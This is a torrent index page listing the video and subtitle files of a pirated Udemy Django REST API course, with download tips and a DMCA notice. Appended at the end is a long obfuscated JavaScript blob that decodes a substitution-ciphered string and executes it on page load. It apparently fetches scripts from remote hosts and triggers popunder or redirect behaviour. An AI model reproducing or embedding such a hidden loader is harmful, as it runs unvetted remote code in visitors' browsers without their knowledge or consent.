[GigaCourse.com] Udemy - Build a Backend REST API with Python & Django - Advanced

mp4   Hot:25   Size:5.51 GB   Created:2022-04-18 11:58:34   Update:2022-12-15 17:19:31  

File List

  • 01 Introduction/001 Welcome to Build a Backend API with Django REST Framework - Advanced.en.srt 3.3 KB
    01 Introduction/001 Welcome to Build a Backend API with Django REST Framework - Advanced.mp4 44.8 MB
    01 Introduction/002 Intro to the course.en.srt 3.09 KB
    01 Introduction/002 Intro to the course.mp4 51.85 MB
    01 Introduction/003 Course structure.en.srt 1.47 KB
    01 Introduction/003 Course structure.mp4 23.37 MB
    01 Introduction/004 How to get the most out of this course.en.srt 1.19 KB
    01 Introduction/004 How to get the most out of this course.mp4 19.61 MB
    01 Introduction/005 How to get help.en.srt 1.95 KB
    01 Introduction/005 How to get help.mp4 29.86 MB
    01 Introduction/006 Windows 10 Home Workaround.html 2.01 KB
    01 Introduction/external-assets-links.txt 237 B
    02 Technologies used in this course/007 Python.en.srt 1.05 KB
    02 Technologies used in this course/007 Python.mp4 16.88 MB
    02 Technologies used in this course/008 Django.en.srt 1.18 KB
    02 Technologies used in this course/008 Django.mp4 20 MB
    02 Technologies used in this course/009 Django REST Framework.en.srt 978 B
    02 Technologies used in this course/009 Django REST Framework.mp4 17.29 MB
    02 Technologies used in this course/010 Docker.en.srt 793 B
    02 Technologies used in this course/010 Docker.mp4 12.77 MB
    02 Technologies used in this course/011 Travis-CI.en.srt 904 B
    02 Technologies used in this course/011 Travis-CI.mp4 15.7 MB
    02 Technologies used in this course/012 Postgres.en.srt 349 B
    02 Technologies used in this course/012 Postgres.mp4 6.67 MB
    02 Technologies used in this course/013 What is test driven development.en.srt 5.44 KB
    02 Technologies used in this course/013 What is test driven development.mp4 87.95 MB
    02 Technologies used in this course/external-assets-links.txt 262 B
    03 Installation and setup/014 System setup.html 3.15 KB
    03 Installation and setup/015 Windows 10 Home Workaround.html 4.05 KB
    04 Create new project/016 Setup new GitHub project.en.srt 3.47 KB
    04 Create new project/016 Setup new GitHub project.mp4 37.9 MB
    04 Create new project/017 Add Dockerfile.en.srt 12.7 KB
    04 Create new project/017 Add Dockerfile.mp4 102.78 MB
    04 Create new project/018 Configure Docker Compose.en.srt 6.26 KB
    04 Create new project/018 Configure Docker Compose.mp4 49.02 MB
    04 Create new project/019 Custom configuration for Linux users.html 4.09 KB
    04 Create new project/020 Create Django project.en.srt 3.68 KB
    04 Create new project/020 Create Django project.mp4 32.62 MB
    04 Create new project/external-assets-links.txt 824 B
    05 Setup automation/021 Enable Travis-CI for project.en.srt 2.26 KB
    05 Setup automation/021 Enable Travis-CI for project.mp4 21.39 MB
    05 Setup automation/022 Create Travis-CI configuration file.en.srt 7.95 KB
    05 Setup automation/022 Create Travis-CI configuration file.mp4 77.16 MB
    05 Setup automation/external-assets-links.txt 433 B
    06 Introduction to test driven development (TDD)/023 Writing a simple unit test.en.srt 7.22 KB
    06 Introduction to test driven development (TDD)/023 Writing a simple unit test.mp4 60.66 MB
    06 Introduction to test driven development (TDD)/024 Writing a unit test with TDD.en.srt 6.78 KB
    06 Introduction to test driven development (TDD)/024 Writing a unit test with TDD.mp4 53.62 MB
    06 Introduction to test driven development (TDD)/external-assets-links.txt 759 B
    07 Configure Django custom user model/025 Create core app.en.srt 4.05 KB
    07 Configure Django custom user model/025 Create core app.mp4 30.69 MB
    07 Configure Django custom user model/026 Add tests for custom user model.en.srt 7.71 KB
    07 Configure Django custom user model/026 Add tests for custom user model.mp4 62.46 MB
    07 Configure Django custom user model/027 Implement custom user model.en.srt 14.04 KB
    07 Configure Django custom user model/027 Implement custom user model.mp4 107.65 MB
    07 Configure Django custom user model/028 Normalize email addresses.en.srt 4.49 KB
    07 Configure Django custom user model/028 Normalize email addresses.mp4 37.77 MB
    07 Configure Django custom user model/029 Add validation for email field.en.srt 3.46 KB
    07 Configure Django custom user model/029 Add validation for email field.mp4 28.22 MB
    07 Configure Django custom user model/030 Add support for creating superusers.en.srt 7.01 KB
    07 Configure Django custom user model/030 Add support for creating superusers.mp4 60.11 MB
    07 Configure Django custom user model/external-assets-links.txt 2.08 KB
    08 Setup Django admin/031 Add tests for listing users in Django admin.en.srt 12 KB
    08 Setup Django admin/031 Add tests for listing users in Django admin.mp4 89.67 MB
    08 Setup Django admin/032 Modify Django admin to list our custom user model.en.srt 2.95 KB
    08 Setup Django admin/032 Modify Django admin to list our custom user model.mp4 23.94 MB
    08 Setup Django admin/033 Modify Django admin to support changing user model.en.srt 9.91 KB
    08 Setup Django admin/033 Modify Django admin to support changing user model.mp4 77.45 MB
    08 Setup Django admin/034 Modify Django admin to support creating users.en.srt 6.38 KB
    08 Setup Django admin/034 Modify Django admin to support creating users.mp4 48.35 MB
    08 Setup Django admin/external-assets-links.txt 874 B
    09 Setting up database/035 Add postgres to docker compose.en.srt 7.63 KB
    09 Setting up database/035 Add postgres to docker compose.mp4 51.9 MB
    09 Setting up database/036 Add postgres support to Dockerfile.en.srt 8.13 KB
    09 Setting up database/036 Add postgres support to Dockerfile.mp4 52.98 MB
    09 Setting up database/037 Configure database in Django.en.srt 3.9 KB
    09 Setting up database/037 Configure database in Django.mp4 30.75 MB
    09 Setting up database/external-assets-links.txt 1.02 KB
    10 Waiting for postgres to start/038 Mocking with unittests.en.srt 2.35 KB
    10 Waiting for postgres to start/038 Mocking with unittests.mp4 29.77 MB
    10 Waiting for postgres to start/039 Add tests for wait_for_db command.en.srt 16.86 KB
    10 Waiting for postgres to start/039 Add tests for wait_for_db command.mp4 134.91 MB
    10 Waiting for postgres to start/040 Add wait_for_db command.en.srt 9.59 KB
    10 Waiting for postgres to start/040 Add wait_for_db command.mp4 82.7 MB
    10 Waiting for postgres to start/041 Make docker compose wait for db.en.srt 4.01 KB
    10 Waiting for postgres to start/041 Make docker compose wait for db.mp4 29.53 MB
    10 Waiting for postgres to start/042 Test in browser.en.srt 4.35 KB
    10 Waiting for postgres to start/042 Test in browser.mp4 32.1 MB
    10 Waiting for postgres to start/external-assets-links.txt 1003 B
    11 Create user management endpoints/043 Create users app.en.srt 5.04 KB
    11 Create user management endpoints/043 Create users app.mp4 42.64 MB
    11 Create user management endpoints/044 Add tests for create user API.en.srt 22.16 KB
    11 Create user management endpoints/044 Add tests for create user API.mp4 184.07 MB
    11 Create user management endpoints/045 Add create user API.en.srt 18.34 KB
    11 Create user management endpoints/045 Add create user API.mp4 146.38 MB
    11 Create user management endpoints/046 UPDATE Fix for testing password too short.html 2.32 KB
    11 Create user management endpoints/047 Add tests for creating a new token.en.srt 14.46 KB
    11 Create user management endpoints/047 Add tests for creating a new token.mp4 127.41 MB
    11 Create user management endpoints/048 Add create token API.en.srt 18.84 KB
    11 Create user management endpoints/048 Add create token API.mp4 144.4 MB
    11 Create user management endpoints/049 Add tests for manage user endpoint.en.srt 16.23 KB
    11 Create user management endpoints/049 Add tests for manage user endpoint.mp4 149.13 MB
    11 Create user management endpoints/050 Add manage user endpoint.en.srt 16.46 KB
    11 Create user management endpoints/050 Add manage user endpoint.mp4 136.36 MB
    11 Create user management endpoints/external-assets-links.txt 2.01 KB
    12 Create tags endpoint/051 Create recipe app.en.srt 3.3 KB
    12 Create tags endpoint/051 Create recipe app.mp4 34.07 MB
    12 Create tags endpoint/052 Add tag model.en.srt 11.98 KB
    12 Create tags endpoint/052 Add tag model.mp4 105.48 MB
    12 Create tags endpoint/053 Add tests for listing tags.en.srt 17.33 KB
    12 Create tags endpoint/053 Add tests for listing tags.mp4 140.38 MB
    12 Create tags endpoint/054 Add feature to list tags.en.srt 17.24 KB
    12 Create tags endpoint/054 Add feature to list tags.mp4 125.8 MB
    12 Create tags endpoint/055 Add create tags feature.en.srt 9.75 KB
    12 Create tags endpoint/055 Add create tags feature.mp4 78.67 MB
    12 Create tags endpoint/external-assets-links.txt 1.8 KB
    13 Create ingredients endpoint/056 Add ingredient model.en.srt 5.4 KB
    13 Create ingredients endpoint/056 Add ingredient model.mp4 47.49 MB
    13 Create ingredients endpoint/057 Add tests for listing ingredients.en.srt 13.65 KB
    13 Create ingredients endpoint/057 Add tests for listing ingredients.mp4 118.42 MB
    13 Create ingredients endpoint/058 Implement feature for list ingredients.en.srt 6.7 KB
    13 Create ingredients endpoint/058 Implement feature for list ingredients.mp4 56.66 MB
    13 Create ingredients endpoint/059 Implement feature for creating ingredients.en.srt 10.48 KB
    13 Create ingredients endpoint/059 Implement feature for creating ingredients.mp4 96.1 MB
    13 Create ingredients endpoint/060 Re-factor tags and ingredients viewsets.en.srt 9.88 KB
    13 Create ingredients endpoint/060 Re-factor tags and ingredients viewsets.mp4 93.95 MB
    13 Create ingredients endpoint/external-assets-links.txt 932 B
    14 Create recipe endpoint/061 Add recipe model.en.srt 17.99 KB
    14 Create recipe endpoint/061 Add recipe model.mp4 158.51 MB
    14 Create recipe endpoint/062 Add tests for listing recipes.en.srt 20.7 KB
    14 Create recipe endpoint/062 Add tests for listing recipes.mp4 175.6 MB
    14 Create recipe endpoint/063 Implement feature for listing recipes.en.srt 11.62 KB
    14 Create recipe endpoint/063 Implement feature for listing recipes.mp4 96.99 MB
    14 Create recipe endpoint/064 Add tests for retrieving recipe detail.en.srt 13.97 KB
    14 Create recipe endpoint/064 Add tests for retrieving recipe detail.mp4 109.5 MB
    14 Create recipe endpoint/065 Implement feature for retrieving recipe detail.en.srt 10.46 KB
    14 Create recipe endpoint/065 Implement feature for retrieving recipe detail.mp4 78.47 MB
    14 Create recipe endpoint/066 Add tests for creating recipes.en.srt 15.06 KB
    14 Create recipe endpoint/066 Add tests for creating recipes.mp4 130.63 MB
    14 Create recipe endpoint/067 Implement feature for creating recipes.en.srt 5.89 KB
    14 Create recipe endpoint/067 Implement feature for creating recipes.mp4 50.05 MB
    14 Create recipe endpoint/068 Add tests for updating recipes.en.srt 12.95 KB
    14 Create recipe endpoint/068 Add tests for updating recipes.mp4 117.13 MB
    14 Create recipe endpoint/external-assets-links.txt 1.81 KB
    15 Add upload image endpoint/069 Add Pillow requirement.en.srt 15.71 KB
    15 Add upload image endpoint/069 Add Pillow requirement.mp4 131.18 MB
    15 Add upload image endpoint/070 Modify recipe model.en.srt 14.45 KB
    15 Add upload image endpoint/070 Modify recipe model.mp4 129.52 MB
    15 Add upload image endpoint/071 Add tests for uploading image to recipe.en.srt 16.25 KB
    15 Add upload image endpoint/071 Add tests for uploading image to recipe.mp4 157.51 MB
    15 Add upload image endpoint/072 Add feature to upload image.en.srt 13.36 KB
    15 Add upload image endpoint/072 Add feature to upload image.mp4 131.95 MB
    15 Add upload image endpoint/external-assets-links.txt 1.4 KB
    16 Add filtering/073 Add tests for filtering recipes.en.srt 9.7 KB
    16 Add filtering/073 Add tests for filtering recipes.mp4 117.61 MB
    16 Add filtering/074 Implement feature to filter recipes.en.srt 11.02 KB
    16 Add filtering/074 Implement feature to filter recipes.mp4 114.66 MB
    16 Add filtering/075 Add tests for filtering tags and ingredients.en.srt 14.67 KB
    16 Add filtering/075 Add tests for filtering tags and ingredients.mp4 201.25 MB
    16 Add filtering/076 Implement feature for filtering tags and ingredients.en.srt 8.51 KB
    16 Add filtering/076 Implement feature for filtering tags and ingredients.mp4 100.97 MB
    16 Add filtering/external-assets-links.txt 478 B
    17 Summary/077 What was covered in this course.en.srt 1.13 KB
    17 Summary/077 What was covered in this course.mp4 18.97 MB
    [GigaCourse.com].url 49 B

Download Info

  • Tips

    “[GigaCourse.com] Udemy - Build a Backend REST API with Python & Django - Advanced” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();